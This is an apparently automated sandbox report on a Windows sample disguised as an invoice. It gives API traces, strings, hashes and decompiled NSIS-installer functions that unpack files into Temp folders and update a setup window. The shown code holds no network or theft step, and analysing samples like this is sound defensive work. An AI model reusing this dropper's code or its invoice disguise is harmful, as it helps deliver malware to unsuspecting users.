0x004064ad
0x004064b0
0x004064b3
0x00000000
0x004064b3
0x00406463
0x00406466
0x00406469
0x0040647e
0x00406485
0x0040646b
0x00406472
0x00406472
0x0040648d
0x00406490
0x00406455
0x00406456
0x00406456
0x00000000
0x00406490
0x00406343
0x0040634b
0x0040634d
0x0040634e
0x00406367
0x00406367
0x0040636e
0x0040636e
0x00406375
0x00406377
0x00406379
0x00406379
0x0040637a
0x0040637c
0x004063b7
0x004063ba
0x004063ca
0x004063cd
0x004063d5
0x004063db
0x004063db
0x00406438
0x00406438
0x0040643a
0x00000000
0x00000000
0x004063df
0x004063e6
0x004063e7
0x004063e9
0x00406403
0x00406411
0x00406417
0x00406419
0x00406434
0x00406434
0x00406434
0x00000000
0x00406434
0x0040641f
0x0040642a
0x00406430
0x00406432
0x00000000
0x00000000
0x00000000
0x00406432
0x004063eb
0x004063ee
0x00000000
0x00000000
0x004063fd
0x004063ff
0x00406401
0x00000000
0x00000000
0x00000000
0x00406401
0x00000000
0x00406438
0x004063c2
0x00000000
0x0040637e
0x0040639c
0x004063a1
0x004063a5
0x00406445
0x00406445
0x00406448
0x00406450
0x00406450
0x00000000
0x00406448
0x004063ad
0x0040643c
0x0040643c
0x00406440
0x00000000
0x00000000
0x00406442
0x00000000
0x00406442
0x0040637c
0x00406350
0x00406355
0x00000000
0x00000000
0x00406357
0x0040635a
0x00000000
0x00000000
0x0040635c
0x0040635f
0x00000000
0x00406361
0x00406361
0x00000000
0x00406361
0x0040635f
0x004064d9
0x004064e4
0x004064f0
0x004064f0
0x00000000

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063C2
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 004063D5
SHGetSpecialFolderLocation.SHELL32(004052FA,007924D8,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 00406411
SHGetPathFromIDListW.SHELL32(007924D8,Call), ref: 0040641F
CoTaskMemFree.OLE32(007924D8), ref: 0040642A
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406450
lstrlenW.KERNEL32(Call,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 004064A8

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040644A
Call, xrefs: 004062AB, 00406386, 0040638D, 00406391, 004063AB, 004063AC, 004063C1, 004063D4, 004063F0, 0040641B, 0040644F, 00406455, 00406471, 00406484, 004064A1, 004064A7, 004064B3, 004064E6
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406392

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-1230650788
Opcode ID: 1ab1bfc9e483f0d7decbabd2a64a8250e199f3f83b6f9b6e16045226286d04ff
Instruction ID: 53892de15873aface2ea8104bec8e4e448d1085f61c5dcff38edd77b46373637
Opcode Fuzzy Hash: 1ab1bfc9e483f0d7decbabd2a64a8250e199f3f83b6f9b6e16045226286d04ff
Instruction Fuzzy Hash: AA610371A00111AADF249F64DC40ABE37A5BF55324F12813FE547B62D0DB3D89A2CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __edi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t81;
				void* _t82;
				WCHAR* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402C37(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x28) & 0x00000007;
				_t35 = E00405BA7( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t84 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405B30(E0040625F(_t84, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated")), ??);
				} else {
					E0040625F();
				}
				E004064F3(_t84);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E004065A2(_t84);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x1c);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405D2C(_t84);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405D51(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x30) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004052C3(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x7a8ac8;
						goto L32;
					} else {
						E0040625F("C:\Users\Arthur\AppData\Local\Temp\nsp1D68.tmp", _t81);
						E0040625F(_t81, _t84);
						E00406281(_t77, _t81, _t84, "C:\Users\Arthur\AppData\Local\Temp\nsp1D68.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x14)));
						E0040625F(_t81, "C:\Users\Arthur\AppData\Local\Temp\nsp1D68.tmp");
						_t64 = E004058C1("C:\Users\Arthur\AppData\Local\Temp\nsp1D68.tmp\System.dll",  *(_t86 - 0x28) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x7a8ac8 =  &( *0x7a8ac8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t84);
								_push(0xfffffffa);
								E004052C3();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004052C3(0xffffffea,  *(_t86 - 8)); // executed
				 *0x7a8af4 =  *0x7a8af4 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t86 - 0x30));
				_push( *((intOrPtr*)(_t86 - 0x20)));
				_t45 = E004030FA(); // executed
				 *0x7a8af4 =  *0x7a8af4 - 1;
				__eflags =  *(_t86 - 0x1c) - 0xffffffff;
				_t82 = _t45;
				if( *(_t86 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x30), _t86 - 0x1c, _t77, _t86 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x30)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E00406281(_t77, _t82, _t84, _t84, 0xffffffee);
					} else {
						E00406281(_t77, _t82, _t84, _t84, 0xffffffe9);
						lstrcatW(_t84,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t84);
					E004058C1();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x00402885
0x00402885
0x00402abf
0x00402ac2
0x00402ac2
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402ac8
0x00402ac8
0x00402ac8
0x00401867
0x00401867
0x00401868
0x00401493
0x004022f1
0x004022f1
0x004022f1
0x00401865
0x0040185e
0x00402aca
0x00402ace
0x00402ace
0x00401892
0x00401897
0x0040189d
0x0040189e
0x0040189f
0x004018a2
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x004022ec
0x00000000
0x004022ec
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated,?,?,00000031), ref: 004017D5

Part of subcall function 0040625F: lstrcpynW.KERNEL32(?,?,00000400,00403421,Tophyperidrosis Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040626C

Part of subcall function 004052C3: lstrlenW.KERNEL32(007A0F00,00000000,007924D8,76F923A0,?,?,?,?,?,?,?,?,?,0040323B,00000000,?), ref: 004052FB
Part of subcall function 004052C3: lstrlenW.KERNEL32(0040323B,007A0F00,00000000,007924D8,76F923A0,?,?,?,?,?,?,?,?,?,0040323B,00000000), ref: 0040530B
Part of subcall function 004052C3: lstrcatW.KERNEL32(007A0F00,0040323B), ref: 0040531E
Part of subcall function 004052C3: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 00405330
Part of subcall function 004052C3: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405356
Part of subcall function 004052C3: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405370
Part of subcall function 004052C3: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040537E

Strings

C:\Users\user\AppData\Local\Temp\nsp1D68.tmp\System.dll, xrefs: 00401835, 00401851
C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated, xrefs: 0040179E
C:\Users\user\AppData\Local\Temp\nsp1D68.tmp, xrefs: 00401821, 0040183F
Call, xrefs: 0040178D, 00401796, 004017A3, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated$C:\Users\user\AppData\Local\Temp\nsp1D68.tmp$C:\Users\user\AppData\Local\Temp\nsp1D68.tmp\System.dll$Call
API String ID: 1941528284-359380382
Opcode ID: 3036717f3dd684cf2377e65c949b0f8917e20074c55b6eb4d43db9bd976140e3
Instruction ID: f7ad0716a47908c9ff001062aeffa45098cd3b08a1486a00dbbe40ca2a302bdd
Opcode Fuzzy Hash: 3036717f3dd684cf2377e65c949b0f8917e20074c55b6eb4d43db9bd976140e3
Instruction Fuzzy Hash: 56419671910515BECF117BA5CD85DAF3A75EF41329B20823FF412B11E2CA3C8A529A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00402644(intOrPtr __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x48)) = _t65;
				_t66 = E00402C15(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t72;
				 *((intOrPtr*)(_t76 - 0x3c)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t76 - 4));
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x3c) = 0x3ff;
					}
					if( *__esi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *((intOrPtr*)(_t76 - 4)) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x30) = __ebx;
						 *(__ebp - 0x10) = E004061BF(__ecx, __esi);
						if( *(__ebp - 0x3c) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x2c)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx ||  *(__ebp - 8) != __ebx || E00405E32( *(__ebp - 0x10), __ebx) >= 0) {
										__eax = __ebp - 0x44;
										if(E00405DD4( *(__ebp - 0x10), __ebp - 0x44, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x38;
									_push(__ebx);
									_push(__ebp - 0x38);
									__eax = 2;
									__ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x10), __ebp + 0xa, __ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x38);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x48) = __ecx;
											 *(__ebp - 0x44) = __eax;
											if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004061A6( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x44 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x44, ?str?) != 0) {
													L21:
													__eax =  *(__ebp - 0x44);
												} else {
													__esi =  *(__ebp - 0x48);
													__esi =  ~( *(__ebp - 0x48));
													while(1) {
														_t22 = __ebp - 0x38;
														 *_t22 =  *(__ebp - 0x38) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x44) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
														__esi = __esi + 1;
														__eax = SetFilePointer( *(__ebp - 0x10), __esi, __ebx, "true"); // executed
														__ebp - 0x44 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x38), __ebp - 0x44, ?str?) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x30) == 0xd ||  *(__ebp - 0x30) == 0xa) {
														if( *(__ebp - 0x30) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x48) =  ~( *(__ebp - 0x48));
															__eax = SetFilePointer( *(__ebp - 0x10),  ~( *(__ebp - 0x48)), __ebx, "true");
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x30) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x3c));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x00402644
0x00402646
0x00402649
0x0040264b
0x0040264e
0x00402653
0x00402657
0x0040265a
0x0040265d
0x00402abf
0x00402ac2
0x00402663
0x00402663
0x0040266a
0x0040266c
0x0040266c
0x00402672
0x004027d6
0x004027d6
0x004027d9
0x004027de
0x004015b6
0x00402885
0x00402885
0x00000000
0x00402678
0x00402679
0x00402684
0x00402687
0x00402693
0x00402697
0x0040272f
0x00402747
0x00402757
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040269d
0x0040269d
0x004026a0
0x004026a1
0x004026a4
0x004026a9
0x004026b0
0x004026b8
0x00000000
0x004026be
0x004026be
0x004026c3
0x00000000
0x004026c9
0x004026c9
0x004026d1
0x004026d4
0x004026d7
0x00402792
0x00402799
0x004026dd
0x004026e3
0x004026ef
0x00402759
0x00402759
0x004026f1
0x004026f1
0x004026f4
0x004026f6
0x004026f6
0x004026f6
0x004026f9
0x004026fe
0x00402701
0x00000000
0x00000000
0x00402703
0x00402706
0x0040270e
0x0040271a
0x00402728
0x00000000
0x0040272a
0x00000000
0x0040272a
0x00000000
0x00402728
0x004026f6
0x0040275c
0x0040275f
0x00000000
0x00402761
0x00402766
0x004027a7
0x004027c9
0x004027d0
0x004027b5
0x004027b5
0x004027b8
0x004027bb
0x004027be
0x004027be
0x00000000
0x0040276f
0x0040276f
0x00402772
0x00402775
0x0040277b
0x0040277f
0x00402782
0x00000000
0x00000000
0x00000000
0x00000000
0x00402782
0x00402766
0x0040275f
0x004026d7
0x004026c3
0x004026b8
0x00000000
0x00402784
0x00402784
0x00402787
0x00402790
0x00000000
0x00402687
0x00402672
0x00402ac8
0x00402ace

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026EB
SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 0040270E
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 00402724

Part of subcall function 00405E32: SetFilePointer.KERNEL32(?,00000000,00000000,?,?,00000000,?,?,00402629,00000000,00000000,?,00000000,00000011), ref: 00405E48

SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D0

Strings

9, xrefs: 00402693

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: bbfadd1fb82cd2902055e903a3e488c979ded5586cb93e8eb0be3a96e306ad52
Instruction ID: 9be2b0b37b52d723af7ab0687330b4cdc43bee68c69c879290400e1721267ab5
Opcode Fuzzy Hash: bbfadd1fb82cd2902055e903a3e488c979ded5586cb93e8eb0be3a96e306ad52
Instruction Fuzzy Hash: BA51F675D00219AADF20DFA5DA88AAEB779FF04304F10443BE511F72D0DBB89982CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004052C3 Relevance: 10.6, APIs: 7, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004052C3(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x7a7a04; // 0x403ba
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x7a8af4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E00406281(_t38, 0, 0x7a0f00, 0x7a0f00, _a4);
					}
					_t27 = lstrlenW(0x7a0f00);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x7a79e8, 0x7a0f00); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x7a0f00;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x7a0f00[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x7a0f00, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x004052c9
0x004052d3
0x004052d8
0x004052de
0x004052e9
0x004052ec
0x004052ef
0x004052f5
0x004052f5
0x004052fb
0x00405303
0x00405306
0x00405323
0x00405327
0x00405330
0x00405330
0x0040533a
0x00405343
0x0040534f
0x00405356
0x0040535a
0x0040535d
0x00405370
0x0040537e
0x0040537e
0x00405382
0x00405384
0x00405387
0x00000000
0x00405387
0x00405308
0x00405310
0x00405318
0x0040531e
0x00000000
0x0040531e
0x00405318
0x00405306
0x00405393

APIs

lstrlenW.KERNEL32(007A0F00,00000000,007924D8,76F923A0,?,?,?,?,?,?,?,?,?,0040323B,00000000,?), ref: 004052FB
lstrlenW.KERNEL32(0040323B,007A0F00,00000000,007924D8,76F923A0,?,?,?,?,?,?,?,?,?,0040323B,00000000), ref: 0040530B
lstrcatW.KERNEL32(007A0F00,0040323B), ref: 0040531E
SetWindowTextW.USER32(007A0F00,007A0F00), ref: 00405330
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405356
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405370
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040537E

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

